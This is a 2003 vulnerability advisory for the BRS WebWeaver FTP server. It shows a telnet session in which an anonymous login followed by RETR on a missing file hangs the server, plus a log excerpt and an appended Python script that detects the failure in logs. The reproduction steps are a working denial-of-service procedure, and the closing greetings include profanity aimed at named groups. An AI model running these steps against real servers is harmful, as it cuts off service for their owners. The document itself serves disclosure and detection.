=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: Ftpd Lockdown via RETR cmd
product: BRS WebWeaver 1.04 and prior
vendor: http://www.brswebweaver.com
risk: high
date: 04/23/2k3
tested platform: Windows 98 Second Edition
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/021.en.txt
               http://f0kp.iplus.ru/bz/021.ru.txt
contact email: euronymous@iplus.ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=

BRS WebWeaver has a dumb bug when a client tries to access a
nonexistent object with the RETR command. The normal behavior of an
FTP server would be to print an error message, but WebWeaver just
locks itself up.

}-------- sample session -----------{
e@some_box$ telnet hostname 21
220 BRS WebWeaver FTP Server ready.
USER anonymous
331 Password required for anonymous.
PASS user@host
230 User anonymous logged in.
RETR blah
150 Opening data connection for blah.
}-------- sample session -----------{

Then I just close the telnet session with WebWeaver and try to connect
to the server with an ftp program.

}-------- sample session -----------{
e@some_box$ ftp hostname
Connection with hostname
}-------- sample session -----------{

That's all. The server is locked. No one can log in to the FTP server.
If I try to restart the FTP server, the following appears in my log
file:

}---------- from ftp.log -----------{
21/Apr/2003:17:30:27 - 195.**.***.** - User: anonymous - Disconnected
FTP Server Stopped
21/Apr/2003:17:30:38 - ERROR: FTP Server Fail to Start
21/Apr/2003:17:30:38 - Error 10022 in function WSAASyncSelect Invalid argument
}---------- from ftp.log -----------{

Therefore, to restart the FTP server you must close WebWeaver (along
with the HTTP server) and run it again.

shouts: DWC, DHG, HUNGOSH, security.nnov.ru, Black Tigerz Research
Group, The N0b0D1eS, all russian security guyz!! to kate especially ))
f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb f*cking
team

================
im not a lame,
not yet a hacker
================
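A log check for the failure signature shown in the ftp.log excerpt above, as an added example that is not part of the original advisory: it reports each failed FTP restart, the socket error logged with it, and the last client that disconnected beforehand. The sample log is constructed from the excerpt's format (with a documentation IP address), and the function names are this example's own.

```python
import re

# Entry prefix as it appears in the excerpt: "21/Apr/2003:17:30:38 - "
STAMP = re.compile(r"(\d{2}/[A-Za-z]{3}/\d{4}:\d{2}:\d{2}:\d{2}) - ")
DISCONNECT = re.compile(r"(\S+) - User: (\S+) - Disconnected")
SOCK_ERR = re.compile(r"Error (\d+) in function (\w+)")

def split_entries(text):
    """Split raw log text into (timestamp, message) pairs. Splitting on the
    timestamp prefix, not on newlines, keeps unstamped lines such as
    "FTP Server Stopped" attached to the entry before them."""
    parts = STAMP.split(text)  # [preamble, ts1, msg1, ts2, msg2, ...]
    return [(ts, " ".join(msg.split())) for ts, msg in zip(parts[1::2], parts[2::2])]

def find_failed_restarts(text):
    """Report every 'Fail to Start' entry with the socket error that follows
    it and the last client seen disconnecting before the failure."""
    entries = split_entries(text)
    findings, last_client = [], None
    for i, (ts, msg) in enumerate(entries):
        m = DISCONNECT.match(msg)
        if m:
            last_client = {"time": ts, "ip": m.group(1), "user": m.group(2)}
        if "FTP Server Fail to Start" not in msg:
            continue
        finding = {"time": ts, "error": None, "function": None, "last_client": last_client}
        # In the excerpt the socket error is the next entry, with the same timestamp.
        if i + 1 < len(entries) and entries[i + 1][0] == ts:
            err = SOCK_ERR.search(entries[i + 1][1])
            if err:
                finding["error"], finding["function"] = int(err.group(1)), err.group(2)
        findings.append(finding)
    return findings

# Constructed sample modelled on the advisory's ftp.log excerpt (documentation IP).
SAMPLE_LOG = """\
21/Apr/2003:17:30:27 - 192.0.2.10 - User: anonymous - Disconnected
FTP Server Stopped
21/Apr/2003:17:30:38 - ERROR: FTP Server Fail to Start
21/Apr/2003:17:30:38 - Error 10022 in function WSAASyncSelect Invalid argument
"""

if __name__ == "__main__":
    for f in find_failed_restarts(SAMPLE_LOG):
        print(f)
```

A finding with error 10022 means the listener could not be re-created, which per the advisory is only cleared by closing and relaunching WebWeaver itself.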